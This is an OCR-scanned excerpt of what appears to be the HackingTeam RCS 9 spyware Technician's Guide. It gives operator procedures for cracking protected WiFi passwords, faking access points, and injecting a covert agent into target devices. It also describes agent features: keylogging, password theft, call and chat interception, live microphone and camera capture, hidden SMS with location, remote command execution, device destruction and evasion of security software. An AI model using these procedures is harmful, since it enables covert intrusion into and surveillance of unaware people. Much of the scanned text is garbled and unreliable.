RCS 9 - Acquiring a protected WiFi network password Steps Result 1. In the Network Injector or Wireless Intruder tab, select the network interface. Link test to wireless network 2. Click Link test: awindow appears where test Int?rfa?e: wlam results are displayed. Channel: 3. Ifthe test failed, move to a better pos'tion ESSID: where the signal is stronger and repeat the test IMPORTANT: attack will not be Link test Result success?Jl if the test fails Injection testto wireless network {if Connectiyity test to wireless network Rep eat link test Acquiring a protected WiFi network password How to acquire a protected WiFi network password is described below: Steps Result 1. In the Wireless Intruder tab, select the WiFi network interface in Wirelessinterface -. 'I's d:lcul I: not ICenter 2 . In network, the network Wh DEE Nume kll?leIJJI LouEs?sLEI-u password l5 t0 be .- . Wil Bless. IIELonlt: - 0 NCITE: manage network interface mum?. connectionsfdisconnectjons from the operating system and click Refresh. 3. In Attack type select the type ofattack. 4. Ifnecessary, click Wordlist to load an additional dictionary to attack WPA or WPA 2 protected networks I IMPORTANT: the additional dictionary must be loaded at each attack. Technician's Guide yer.1.5 RC8 9 201333] - peg. 88

RC3 9 - Infecting targets using automatic identi?cation Steps Result 5. Click Start: the Syste au nche 1urariou attacks t0 ?nd the access pam?rd Looiyitcm 6. Stop to stop the attack. . . MEL-walk: - HI: mic: - I 1: worn-lit: Pnuw'ol :i Startan outta-mu:I attack Is stir-n1 Target F-TEIEI Target Edi-1m- I: 'A'n rdll1r Eton cottirc i'.1 ndsi?nkr- n.1rkot'. If attacks are the password appears over the Status indicat?n wiwlum Lon 3;:th Forrest. wil E-IEH - ?rack lypc: 7 In: wifilr-ulunm wee-Wee Ulitla nanl attack Hula n1 F-?u?lr?J I: Eton '1 rd Pass.on Id i 5.: nuif lELlpaLb 8. Using the operating system Network Manager use the password to connect to the WiFi network. 'lhe password is saved by the system and no longer needs to be entered. 9. Dpen the Network Injector section to start identi?cation and infection. lnfecting targets using automatic identification To start automatic identification and infection: Technician's Guide uer.1.5 RCSQ 2013 - pag. 89

RC5 9 - Infecting targets using automatic identi?cation Steps Result 1. In the Network Injector tab, select the network interface for injection in the Network Interface ?Stbox log @?J?om 'I'mtlcal Control. Center Network tn - Hignnl: 'llI-?tt 2. In the Snif?ng interface list box, select a different network interface to be used for snif?ng or select the same interface used ?my ?le for injection. I Hiya-kw?: :c'lr L45. mes .ldlI-L NOTE: manage network interface connectionsg'disconnectjons from the operating system and click Refresh. use two different interfaces to ?mm? ?Id guarantee better device identi?cation. 3. Check a'gn a power and, if necessary, run the nemork te St test Wilden. Lou r-teLonl: faLe: ?taut! la 'rJil'ilulJ Eiullaktt?c'? Reflesh NOTE: a'gnal power must be at least El?n. A a'ngle value will be returned I I Corina Rules. Ifthe same network Interface Is used for injection and mif?ng. Eni?iuqiumr?g; Sial'nl: i It'- CE lI-t-Ir lI'l'r:l all 4. Click Start. tactlcal Control. Center 5. The network mif?ng process starts and all ?Mum-um": Lamar-2m device 5 id enti?ed as targe t5 appe an Th hct'kors :c var?can 5 :ral: mt reams.- Status column displavs identification status(orrl; imp ., WA RNING. verl?ur Identl?catlon a statu sSee ?Tactical Control Center nlLa I't't'll'rlill UH Insl Imf: : Iml a . rah! y? x. raw cc: muss-L154 HnanInr raw 6. Target devIces begln to be Infecte d. x. senor-indentraw InfectJon start Is recorded In the log. m? NOTE: non target devices don't appear in the list and are thus . . . -r - excluded from automatlc InfectJon. Technician's Guide ver.1.5 RC3 9 20133) - pag. 90

RC5 9 - Forcing unknown device auihen?cation Steps Result To stop infec?on, click Stop. Forcing unknown device authentication To force an unknown device authentication: Steps Result Tactical Control. Center 1. In Ihe Network Injector tab, select unknown laker-uccrosl-?oiuL izllel Wil' 1' Bialul: some Rellesl' 1' devices from the list [stains izllel '.?ul.drll wil Cox?li'. Rules. r- Nerd-ml: srans Finn-1c: Instweh l'l'JlE? wranewbroens 151.155.1111 wwrawaw raw .1 Mk.- Is:.1ss.1.1sd rat-.- I Hll'l Mk.- I'sz- I I . 2. Click Reauth selected: devices are forced to re-authen?cate. u. Tlp: in certain cases, all devices must he auihenticated. To do ?iis, click Reauth All. 3. lfre?au?ien?cation is success?Jl, automa?c iden??cation is started: device staluswill he and can be infected from now on. lnfecting targets using manual identification To manually infect network devices: Technician's Guide ver.1.5 RC3 9 201313 - pag. 91

RCS 9 - Setting ?lters on tapped traf?c Steps Result 1. In Network Injector, select one or more devices to be infected from the device list and identify:r them using the displayed data. E. ifthere are a lot ofdevices in the list, ?lter the selection.5ee ?Setting filters on tapped traf?c?nelseguito. 2. Click Infect selected: all injection rules are "customized" 1uvith the device data and applied. Device attacks will be displayed in the logs. 0 IMPORTANT: this operation requires a special rule in RCS. E. in certain cases, all connected devices must be infected, even non target devices or these not 1vet connected. To do this, click Infect All. Result: if the infection 1uvas started, device statusis a . Setting filters on tapped traf?c To select target devices using data traf?c filters: Steps Result Technician's Guide ver.1.5 RC3 9 2013? - peg. 92

RC5 9 1he target by analyzing 1uyeb chronology Steps Result 1. In the Network Injector tab, click Network ?lters. 2. For a wider search, enter a regular expression in die Regular expression text box. 3. Dr, to re?ne die searuchJ enter a BPF expression in 1he BPF Network Filter text box. Result: the system only displays ?ltered devices in the list. 4. Manually infect devices as described in Ihe proceduresee ?infecting targets using manual identification opoginogl . T-ItEl-Ell Lon system l- 'Maf'l? :95: Corn: Fate: Shop Hum-ml: Hes-.lsl uplessiult Il'aixbook I "EL-nail. I Apply ?tans H'w hellish-.1 Hnsl'rnmo OS Emu-arr I rran': I .?Ist'wnh nttn: x. Edie Hi- Hum-maroond mane-me Alum-no I.?ng WIrdsr-H? cl'rons x. idle 'ItilHliLh-l Iiil'l u'a'l'o I u'o'l't' .1lI Identify the target by analyzing web chronology To identify a target: Technician's Guide 1..rer.1.5 RC3 9 20133 - pag. 93

RC5 9 - Cleaning erroneoush_.ur infected devices Steps Resuit 1. In the Network Injector tab, double?click the Web history device to be checked: awindow openswilh Resource the chronologyr of the weba'tes via'ted bv WW-E??sls-ir the browser. saFeb E.googlc.tom t1.qstatic.com mad-m isign.LoI'1 wwfa tcbook.tom syo utube_coI?I Ltub e.corn 5.31.1 wwyoutubmom ww f'l .mvw.yo Lruh ww??1.?mvw.yo Ltub e.com wow.youlube.to 11 ?u'i'WTl (?mono til i} LEOITI unmuunnl-nhn nun-u- 2. lflhe device is the target device, close the chronology:r and run procedure ?infecting targets using monuoi identi?cation pogino?l . Cleaning erroneouslyr infected devices To remove an infection from a device, the agent must be closed on the RC5 Console. Emulating an Access Point known bug the target IMPORTANT: before emulating an Access Point, stop anvr current attacks in the Network Injector tab. To transform Tactical Network Injector into an Access Point known by: targets: Technician's Guide ver.1.5 RC3 9 201313} - pag. 94

RC5 9 -Turn off Tactical Network Injector Steps Result 'l-Icticll. :cntrul Cente- 1. In the Fake Access Point tab, select the network interface to listen to in the rtlir-CIECE wil Wire Interface box. .. Jr.t- mg.? i. . :reete a re:- m: v.1:n ELIE- Inn I Add es: .u?tzueu pulnl. :Ilspe-l 2. Select the type ofAccess Point emulation 3. Click Start: Tactical Network Injector recovers the names of the networks devices usually connect to and displays them in the Network Injector tab. 4. At the same time, it establishes communications with the single devices, emulating the access point for each network. 5. In Network Injector, select the same network interface dimlayed as the access pointin the Network interface list box 6. Click Start: connected devices are displayed Manually infect devices as described in the proceduresee ?infecting targets using - rnanuai identification apoginogi . Turn off Tactical Network Injector No special procedure is foreseen. Normal computer shutdown. 1'Ii'iewing infection details To view recorded data, select the Log System tab. Technician's Guide ver.1.5 RC3 9 20133) - pag. 95

RC3 9 - Tactical Control Center data Tactical Control Center data Network Injector data tab Data is described below: Data Description Network List of connected network interfaces. Select the injection interface connected to the interface network on which the device to be attacked is connected. When simulating an Access Point, the interface used in the Fake Access Point section also appears. sniffing Like Network Interface or another network interface to only be used for sniffing. interface Regular Expression used to filter devices connected to the network. It is applied to all data expression transmitted and received by the device via network, of anv kind. See "What you should know about Tactical Control Center" a paginag?. Bpl: This is used to more accurater filter devices using BPF svntax (Berkelev Packet network Filter]. This svntax includes kev words accompanied bv qualifiers: filter See "What you should know about Tactical Control Center" a paginag?. Found device data Data is described below: Data Description Status Connected network device status: unknown device. It cannot be infected due to problems tied to authentication. Forcing authentication. it? device being identi?ed. . device identified and can be infected. infected device. HW Device network card hardware address. address IP address Device's network IP address. Vendor Network card brand (rather reliable}. Technician's Guide ver.1.5 RC3 9 201313} - pag. 96

RC5 9 - Wireless Intruder data tab Dotcr Description Hostname Device name. 05 Device operating system. Browser Web browser used by the device. Last web Last sites visited by the device detected and analvzed in the last five minutes. Traf?c NOTE: if the device no longer generates web traffic at the end of the five minutes, the message Idle will appear. This usuallv occurs when no one is using the device. Last web Last attack tvpe and results. To check additional details, see the LDE 5?5tem tab. attack Wireless Intruder data tab Data is described below: Dotcr Description Wireless List of non connected network interfaces. Select the interface to connect to the interface protected WiFi network to be opened. ESSID Name of the local network to be opened. network Attack type Types of available password identification. Type Description Collects handshakes between the client and access point and dictionary tries to discover the password using a dictionary of common attack words. injects simulating a connected client to collect data and force brute-farce the password. attack pm Tries all the possible combinations to recover the access point brute-farce settings using WiFi Protected Setup protocol. attack Fake Access Point data tab Data is described below: Technician's Guide ver.1.5 RC3 9 20133) - pag. 9?

RC8 9 - Fake rliccess Point data tab Data Description wire 955 List of non connected network interfaces. Select the interface to be displayed as interface the WiFi network, HW address Device network card hardware address. Access point Name of the Access Point expected by the device, Technician'sciuitle uer.1.5 RICE i?i 201393 - pag. 98

RES 9 - System monitoring System monitoring resentatio Introduction System monitoring guarantees constant control of component status and license usage. Content This section includes the following topics: System monitoring {Monitor} ..100 System monitoring datalMonitor] uer.1.5 RES Sit-1311:] HT - peg. 99

RC5 9 - System monitoring [Monitor] System monitoring (Monitor) To 111 onitor the system: i - Monitor section Purpose This function lets you: 0 monitor system status in both hardware and software terms 0 monitor license used compared to those purchased Service caii: Contact your HackingTeam Account Manager if additionai iicenses are . required. What the function looks like This is what the page looks like: ?when GED .. . . ..J. Mumulr a .P ..-. . In'rn .wnn url mm. mum-mu in v.71 ":hlzf? :r '21 .I-v-Jnr' .- .-- 1.52;? a. .. - - 4w.? on? as. M. IILHILJI n. sad-3 u-mrl 54:5. In. 1x IF.- '19: r4n'lrnalun 9.. - ".EI-aerI .. . . p. r- F1 omen-Hurry: T-n MH- I?wm I. ..-.- . Area Description 1 RC5 menu. Munlt?t indicates the current number of system alarms triggered. 2 Window toolbar. Technician's Guide yer.1.5 SE P-2013 RC8 9 2013 - pag. 100

RC5 9 -To learn more Area Description 3 List of RCS components and their status: 0 Alarm (generates an e-m ail sent to the alerting group) I . -- - Warning Component running 4 License status. 5 RC5 status bar. To learn more For interface element descriptions See "Shared interface elements and actions? poginol4 . For a description of the data in this window see "System monitoring data (Monitor)? nei seguito . System monitoring data (Monitor) System component monitoring data System monitoring data is described below: Doro Description Type Monitored component type and name: Name 90 Network Controller it Anonymizer - Database Collector Address Component's IP address. Last La st date-tim e. contact Technician's Guide 1uer.1.5 SE P-2013 RC8 9 2013 - pag. 101

RC5 9 - License monitoring data Data Description status Component status at last 0 Alarm: the component is not running, contact the alerting group for immediate seryice. Warning: the component signals a risky situation, contact the system administrator for necessary checks. Component running. CPU 91?: CPU use by the single process. CPU 9f: CPU use by seryer. Total Disk Free 94?: free disk space. License monitoring data License monitoring data is described below: For restricted licenses, the format is "xly" where is the amount of licenses currently used by the system and the maximum amount of licenses. if all the licenses are in use, any new agents will be put in queue until a license ls freed or new ones purchased. Data Description License type Users Agents Desktop Mobile Distributed seryer Collectors Type of license currently in use for agents. reusable: an agent's license can be reused after it is uninstalled. oneshot: an agent's license is only yalid for one installation. NOTE: the license can only be updated if the user has License modification authorization. Amount of users currently used by the system and maximum admitted quantity. Amount of agents currently used by the system and maximum admitted quantity. Amount of desktop and mobile agents currently used by the system and maximum admitted quantities respectiyely. Amount of database currently used by the system and maximum admitted quantity. Amount of Collectors currently used by the system and maximum admitted quantity. Technician's Guide yer.1.5 SE P-2013 RC8 9 2013 - pag. 102

RC8 9 - Lieenee menitoring data Data Description Ananvmizers Ameth ef Aneuymizers currently used by the system and maximum admitted qua ntity. Technician's Guide uer.1.5 23E P-ECI13 RC5 5-1 201333 -pag. 103

Appendix: actions resentatio Introduction An agent is a complex group of events, actions, modules and installation vectors. Single actions are listed belovv with a detailed description of advanced configuration settings. Content This section includes the following topics: List ofsub-actions ._105 Destroy action Executeaction Log action SMS action Uninstall action _.110 Technician's l:Eiuitle ver.1.5 3E P510131 - RES - 2013 PD HT S.r.l. - pag. 104

RC5 9 - List ofsub?acijons List of sub-actions Sub-action data description Sub-actions are described below: Data Description Name Sub?action List of sub-action types Sub-action type description Arbitrary name assigned to an action Available types of sub-actions are described belovv: Action Device Description Destroy desktop, mobile Renders the target device unusabie. Execute desktop, mobile Runs an arbitranr command on the target machine. Log desktop, mobile Creates a custom message. SMS {text message} mobile desktop, mobile Uninstall desktop, mobile '?Destroy action Purpose Sends an hidden SMS from the target device. Runs with the Coiiector. Removes the agentj?rom the device. The Destroy action renders the target device temporarily or permanently unusable. Operating systems Desktop:Windows, US it: Mobile: BlackBerry, WinMobile Technician's Guide ver.1.5 SE P-2013 RC8 9 20139:] -pag. 105

RC5 - Parameters Parameters Nome Description permanent The device is rendered permanentlv unusable. WARNING: the device may need servicing. Execute action Purpose The Execute action runs an arbitrarv command on the target machine. Command settings can be specified, if required, and environment variables. The program will be run with the user permissions of the user currentlv logged into the system. Anv command output can be vievved in the Commands page. See "Command page? on page 44 . I I I WARNING: although all commands are run using the agent's concealment system and are thus invisible, anyr change in the file system ii.e.: a ?le created on the desktop} will be visible to the user. Be careful. WARNING: avoid programs that require user interaction or that open graphical I interfaces. r: Tip: use applications launched by command line or batch file since their processes (and corresponding command line window) are hidden by the agent. Reference to the agent?s folder The SdirS virtual environment variable that refers to the agent's installation folder (hidden) can be added to the command string. Operating systems Desktop: Windows, 05 Mobile: Android, BlackBerrv, WinMobile Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 106

RC5 9 - Signi?cant data Significant data Fieidr Description Command Command to be run. Tip:use an absolute path. Log action Purpose The Log action creates a custom message. NOTE: custom messages and logs coming from an agent are displayed in the Info section.$ee ?Agent page? on page 41 Operating systems Desktop:Windows, OS Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone Parameters Nome Description Text Message text that appears in the ?if? section. action Purpose The 5M5 action sends a hidden SMS (text message) from the target device with the device position and SIM data. Operating systems Mobile: Android, BlackBerry, Symbian, WinMobile Technician's Guide uer.1.5 SE P-2013 RC8 9 2013 - pag. 107

RC5 9 - Parameters Parameters Nome Description Number Telephone number to which the message is sent. Text Message text. position Adds the target's GPS cell or (35M position to the message. Sim Adds the tel ephone's information to the message. . . action Purpose The action the agent and RCS server. The process is broken down in the following steps: Step Description Reciprocal server authentication. server time Agent removal in the event the relevant activity is closed. Agent con?guration update. Upload of all files in the "upload" queue. Download of all files in the "download" queue. Download of all evidence collected lav the agent with simultaneous secure rem oval. Secure removal of all downloaded evidence from the agent. Operating systems Desktop:Windows, OS Mobile: Android, BlackBerrv, i?S, svmbian, WinMobile, Windows Phone Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 103

RC3 9 - Desktop Desktop settings Nome Description Hostname Name of the Anonymizer or Collector connect to for Select the name of the server or enter the FQDN (DNS name] or IP address in the combo box. Bandwidth Maximum bandwidth to be used during Min delay Minimum delay in seconds from one eyidence sent to the next. Max delay Maximum delay in seconds from one eyidence sent to the next. Stop on If enabled, the sub-action chain is interrupted when is successfully success completed. Remaining sub-action in the queue are not run. Mobile settings Nome Description Hostname Anonymizer or Collector name or IP address to connect to for Select the name of the server or enter the FQDN (DNS name) or IP address in the combo box. Stop on The sub-action chain is interrupted when is successfully completed. success Remaining sub-action in the queue are not run. Type Internet: via Internet connection. . Force WiFi: yia WiFi network. Forces a WiFi data connection with any open or preset WiFi network available before starting syn- chronization. 1- Force Cell: yia network . Forces a GPRSIU MTSISG data connection with the mobile operator before starting APN: specifies the login credentials for the APN the phone can use to collect data. This is useful since it avoids charging the target for the traffic generated by the agent IM PURTANT: this method is only supported on BlackBerry and bian. Technician's Guide 1yer.1.5 SE P-2013 RC3 9 2013 - pag. 109

RC5 9 - Uninstall action [ll] Uninstall action Purpose The Uninstall action removes the agent from the target system. All files are deleted. 0 NOTE: on BlackBerrv, removing the agent requires an automatic restart. If the device does not have root privileges on Android, the user must authorize uninstall. To learn how to check whether you have root privileges,see "What you should know about Android? on page 139 . NOTE: on Windows Phone, removing the agent deletes all files generated bv the agent but the application icon remains in the program list. Operating systems Desktop: Windovvs, OS Mobile: Android, BlackBerrv, svmbian, WinMobile, Windows Phone Parameters None Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 110

10 Appendix: events resentatio Introduction An agent is a complex group of events, actions, modules and installation vectors. Single events are listed belovv with a detailed description of advanced configuration settings. Content This section includes the following topics: Event list ._112 ACevent Battery event Call event _.114 Connection event Idleevent Position event .115 Processevent Quota event Screensaver event SimChangeevent SMS event Standbv event ._113 Timerevent Windowevent WinEvent event .120 Technicians l:Eiuitle ver.1.5 3E - RES - 2013 El HT S.r.l. - peg. 111

RES - Eventlist Event list Event data description Events are described below: Date Description Enabled Enables or disables the event. Name Name assigned to the event. Type Event type list. See the table below. Event type description Event type are described below: Event Device Triggers on oction when. AC mobile the mohiie phone is being chorged. Battervr mobile the hotterv chorge ievei is within the specified ronge. Call mobile or coii is mode or received. Connection desktop, the ogentfinds on octive network connection. mobile Idle desktop the user does not in teroct with the computer for setperiod of time. Position mobile the device redches or iedves or specific position. Process desktop, on oppiicotion is iounched or or window is open on the device. mobile Quota desktop the disk spoce occupied bv evidence on the device exceeds the set iirnit. Screensaver desktop the is opened on the torget device. Sim?hange mobile the Sim cord is repiciced. SMS {text mes? mobile or text is receivedfrorn the indiccrted number. sage} mobile the device is in rnode. Timer desktop, the specified intervois eiopse. mobile ver.1.5 SE P-l?lls RES 2CI13EI -pag. 112

RC5 9 - AC event Event De vice Triggers on action when" 1Window desktop a window is opened. WinEvent desktop the operating system iogs a Windows event. event Purpose The AC event triggers an action when the mobile phone is being charged. Operating systems Mobile: Android, BlackBerry, Symbian, WinMobile Parameters None Battery event Purpose The Batteryr event triggers an action when the battery charge level is within the specified range. Tip: to reduce impact on battery use, it is best to link the Batteryr event, set between 30%, to Start and Stop Crisis actions. This way, if the battery charge level drops under the set value, the agent's activities that consume more power will be suspended. I I I. WARNING: the Crisis module can be set to inhibit Operating systems Mobile: Android, BlackBerry, Symbian, WinMobile Parameters Nome Description Ml" Minimum required battery percentage. Percentage over this limit trigger an event. Max lvlaximum required battery percentage. Percentage under this limit trigger an event. Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 113

RC5 9 - Call event ?cCall event Purpose The Call event triggers and action when a call is made or received. Operating systems Mobile: WinMobile, EilackBerrv, svmbian, Android Parameters Home Description Number callee or caller's telephone number (or part of it). nu Tip: leave blank to trigger on any number. IEDConnection event Purpose The Connection even triggers an action when the agent finds an active network connection. For the desktop device, enter the connection destination address. For the mobile device, it triggers an action as soon as the device acquires a valid IP address on anv network interface WiFi, Activesvnc, and terminates the action when all the connections are terminated. Operating systems Desktop: Windows, 05 Mobile: Android, BlackBerrv, svmbian, WinMobile Mobile settings None Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 114

RC5 9 - Desktop Desktop settings Home Description lp Connection destination IP address address NOTE: Enter 0.0.0.0 to indicate any address. 0 NOTE: connections to local addresses in the target?s same subnet are not taken into account. Netmask Netmask applied to the IP address. Port Port used to identify the connection. ZZIdle event Purpose The Idle event triggers an action when the user does not interact with the computer for a set period of time. Operating systems Desktop: Windows, OS Parameters Home Description Time Seconds of inactivity. The event is triggered at the end of this time. 9 Position event Purpose The Position event triggers an action when the target reaches or leaves a specific position. The position can be defined bv GPS coordinates and a range or bv a GSM cell ID. Operating systems Mobile: Android, BlackBerrv, svmbian, WinMobile, Windows Phone Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 115

RC5 9 - Parameters Parameters Nome Description TVPE Type of position to be used. GPS . Latitude, Longitude: coordinates It Distance: range from coordinates. GSM Cell {all operating systems except Windows Phone} . Countrv, Network, Area,lD: GSM cell data. Enter to wildcard a field. For example, if the (L?ountr'vr ?eld is entered and is entered in the three other fields, the event is triggered when the device enters or exits the speci?ed coun- try, Process event Purpose The Process event triggers an action when an application is launched or a window is opened on the device. Operating systems Desktop: Windows, 05 Mobile: Android, BlackBerrv, svmbian, WinMobile Parameters Home Description Type Process Name: the event triggers an action when the specified process is launched. Window Title: the event triggers an action when focus is given to the speci?ed window. string Name or part of the program name or window title. Tip: use special characters when specifying a program "*Calculator*") On (desktop onlv) If selected, the event triggers the action onlv when the process or win- Focus dow are in the foreground. Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 116

RC5 9 - Quota event GQuota event Purpose The Quota event triggers an action when the device?s disk space used to store the collected evidence exceeds the set limit. When disk space falls under the limit, the action will be terminated at the next Operating systems Desktop: Windows Parameters Home Description mm? Disk space to be used to store the collected evidence. Screens-aver event Purpose The Screensaver event triggers an action when the target device runs the screensaver. Operating systems Desktop: Windows, US it: Parameters None SimChange event Purpose The SimChange event triggers an action when the card is changed. Technician's Guide ver.1.5 SE P-2013 RC8 9 20139:] -pag. 11?

RC5 9 - Operating systems Operating systems Mobile: Android, BlackBerry, Symbian, WinMobile Parameters None ESMS event Purpose The 5M5 event triggers an action when a speci?c text message is received from the specified number. The message will not be shown among the received messages on the phone. I WARNING: incoming messages are onlyr deleted on BlackBerryr OS 0 NOTE: the received message is not displayed on the target device. Operating systems Mobile: Android, BlackBerry, Symbian, Parameters Home Description Number SMS sender's phone number. Any SMS from this number will be hidden. Text Part of the message text that must match. Irv'I PO RTANT: the string is not case sensitive. Standby event The Standby event triggers an action when the device enters stand-by mode (backlight off). Operating systems lv?lobile: Android, BlackBerry, Symbian, WinMobile Technician's Guide ver.1.5 SE P-2013 RC8 9 2013 - pag. 113

RC5 - Parameters Parameters None @Timer event Purpose The Timer event triggers an action at the indicated intervals. When the event occurs the action linked to the Start action is run. During the time between event start and stop, the Repeat action is repeated at the interval specified low; the relevant connector. When the event terminates, the Stop action is run. Operating systems Desktop: Windows, 05 Mobile: Android, BlackBerrv, i?S, svmbian, WinMobile, Windows Phone Parameters Nome Description Type Interval type: It Loop: triggers an action, indefiniter repeating it at even; interval, as speci?ed by the Repeat action. In Dailv: triggers a daily action at the times indicated in From and To. In Date: triggers an action in the period indicated in From and To. 0 NOTE: select Forever for continuous action. It triggers an action after a certain number of davs (Days) from agent installation. @Window event Purpose The Window event triggers an action when anv window is opened. Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 119

RC5 9 - Operating systems Operating systems Desktop: Windows Parameters None. EWin Event event Purpose The ?WinEvent event triggers an action when the operating system logs a Windows event. Operating systems Desktop: Windows Parameters Home Description "3 Windows event ID. Source Windows event source system, application) Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 120

11 Appendix: modules resentatio Introduction An agent is a cornplezu: group of events, actions, modules and installation vectors. Single modules are listed below with a detailed description of advanced configuration settings. Content This section includes the follovving topics: Module list 122 Addressbook module Application module Calendar module ..124 Callmodule Camera module Chat module _.12Ei Clipboard module Conferencemodule Crisis module Devicemodule Filemodule Infection module _.130 Kevlog module Livemicmodule Messages module ._131 Mic module Mousemodule Password module ..134 Position module Screenshot module Url module ..13Ei Technician's Guide ver.1.5 SE - RC3 - 20131321 HT - pag. 121

RES - Module list Module list Registration modules are described belovv: ??n?de Configuration Device Accessed files Addressbook App?ca?on Calendar Ca" CaHs Camera Chat cupboard Contacts and Cal- endar Devke F?e Kevlog Kevlog, Mouse and Pasmuord n?essages h?essages nan base advanced advanced advanced advanced base base, advanced advanced advanced base advanced advanced advanced base advanced base advanced desktop desktop; moME desktop; moME desktop; moME desktop; momm desktop; meme desktop; meme desktop; moME desktop; moME desktop; moME desktop; momm desktop; desktop; moME desktop desktop; momm desktop; meme desktop; meme docunientsoriniagesijpened bvthetarget conta appHca?onsLmed. calendar. VVebcaniunages information copied to the clipboard. contacts and calendar. svstern infornnation. fHesopened bvtarget kevspvessed onthe kevboard. kevspvessed onthe kevboard,niouse chk, pasdnordssaved. e?rnail, SMS, MMS. e?rnai I, SMS and chat. audiofronia nncrophone. ver.1.5 SE P-ECIH RES 2013i? -pag. 122

RC5 9 - Addrembook module Module Configurotion Device Mouse advanced desktop '3'le- Password advanced desktop base: target's geographic position. advanced mobile windows opened on the target's screen. advanced mobile URL advanced desktop, Visited URL mobile Visited websites base desktop, visited URL mobile Other tvpes of modules are described below: Module Con?guration Device Action Conference advanced mobile 09395 5' 3'Wa?1" Crisis advanced desktop! Recognizes crisis situations mobile sniffer running). and all commands can be temporarily dis- abl ed. Infection advanced desktop Propagat? the agent 0? Other devices. Livemic advanced mobile Listens to conversations in real time. nnline base desktop! the agent with RCS to mobile allow evidence to be received and the agent to be reset. chronization Addressbook module Purpose The Addressbook module records all the information found in the device's addressbook. The desktop version imports contacts from Outlook, Skype and other sources. Operating systems Desktop: Windows, 05 Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 123

RC5 9 - Signi?cant data Mobile: Android, BlackBerrv, WinMobile Significant data None ElApplication module Purpose The Application module records the name and information on processes opened and closed on the target device. Evidence lists all the applications used by the target in chronological order. Operating systems Desktop: Windows, OS Mobile: Android, BlackBerrv, svmbian, WinMobile Significant data None ECale-ndar module Purpose The Calendar module records all the information found in the calendar on the target device. The desktop version imports the calendar from Outlook and other sources. Operating systems Desktop: Windows, OS lv?lobile: Android, BlackBerrv, WinMobile Significant data None Technician's Guide ver.1.5 SE P-2013 RC8 9 20139:] -pag. 124

RC5 9 - Call module ?cCall module Purpose The Call module captures audio and information (start time, length, caller and called numbers) for all calls made and received by the target. On a desktop device, the Call module taps voice conversations on supported applications. On a mobile device, the Call module taps all calls. Operating systems Desktop: Windows, US it: Mobile: Android, BlackBerrv (information only), 5vm bian (without suppressing the audio signal), WinMobile Significant data Data is described below: Fieid Description Enable call record- {mobile onlv) Enables ca recording. If disabled, call audio is not ing recorded. Buffer size Acquisition buffer size used for audio sectors. (Zlualit'vr Audio quality (1=maximum compression, 10=best qualitv). @Camera module Purpose The Camera module captures an image from the built-in cam era. 1. WARNING: capturing an image on a desktop causes the camera led to blink. Operating systems Desktop: Windows, US it Mobile: svmbian (front camera only, when available), Winiviobile Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 125

RC5 9 - Signi?cant data Significant data Data is described below: Fieid' Description lilualitvr Image quality (1=maximum compression, 10=best quality). ?Chat module Purpose The Chat module records all the target?s chat sessions. Each message is captured as a single piece of evidence. IMPORTANT: for Android, root privileges are required to capture chat. See "What you shoul'd know about Android" on page 139 . IMPORTANT: in order for this module to be started when the device is restarted on BlackBerrv, the telephone must be in for several minutes ibacklight off}. Operating systems Desktop: Windows, US it: Mobile: Android, BlackBerrv Significant data None PCIipboard module Purpose The Clipboard module saves the content of the clipboard in text format. Operating systems Desktop:Windovvs, OS Mobile: Android, BlackBerrv, WinMobile Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 126

RC5 9 - Signi?cant data Significant data None Conference module Purpose The Conference module calls the indicated number opening a conference call whenever the target makes a call. The receiver's number can listen to the conversation in real time. IMPORTANT: module operations depend on the telecom operator features. The target mavr be made aware of the conference call if the telecom operator adds an acoustic signal while waiting for the call to start. Operating systems Mobile: WinMobile Significant data Data is described below: Fieid Description Number receiver's phone number ?iCrisis module Behavior on desktop devices The Crisis module is enabled (automaticallv or upon a speci?c action) and recognizes dangerous situations on the machine that may disclose the agent?s presence on the device a network sniffer running). and all commands can be temporarilv disabled. This module increases the level of stealthness against protection software. 0 NOTE: Crisis can be enabled by default on the desktop device to allow the agent to automaticallv detect dangerous situations, and act accordinglv (ie. going silent). Behavior on mobile devices The Crisis module is used to suspend activities that make heavy use of battery power. Based on its settings, this module can temporarilv disable some functions. Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - peg. 12?

RC3 9 - Operating systems On a mobile device, the Crisis module must be explicitly started by a speci?c action agent is started when the battery level is too low] and stopped when the anomalous situation terminates. NOTE: this module does not create evidence. Operating systems Desktop: Windows, OS Mobile: Android, BlackBerry, WinMobile, Windows Phone Significant desktop data On Desktops, the default settings should not be changed unless otherwise suggested by RC5 Support Team. Fieid Description Inhibits Network Inhibits when potentially dangerous processes are running. Network lnhib- List of processes that, if running, will prevent itors Inhibits Hooking Inhibits program hooking when potentially dangerous processes are run- ning. Hooking Inhibitors List of processes that, if running, will prevent hooking. Process Process to be added to the list. Significant mobile data In the Mobile version, the functions to be blocked can be specified: Fieid Description Iv?lic if selected, it prevents Mic audio recording Call if selected, it prevents Call audio recording Camera if selected, it prevents Camera snapshots Position if selected, it prevents GPS use if selected, it prevents I Warning: highly hazardous operation! Before preventing . please contact HackingTeam support service! You agent may be permanently lost Technician's Guide ver.1.5 SE P-2013 RC3 9 2013 - pag. 128

RC5 9 - Device module module Purpose The Device module records system information processor type, memory in use, installed operating system, root privileges). It can be useful to monitor disk usage on the device and to retrieve the list of applications installed. 0 NOTE: for Android, if the device has root privileges, Device type evidence indicates rootzyes. Operating systems Desktop: Windows, OS Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone Significant mobile data Data is described below: Fieid' Description Retrieve application In addition to system information, record the list of installed appli- list cations. IgFile module Purpose The File module records all ?les that are opened on the target computer. It can also be capture the ?le when opened. Operating systems Desktop: Windows, OS Significant data Data is described below: Technician's Guide ver.1.5 SE P-2013 RC8 9 20136:] - pag. 129

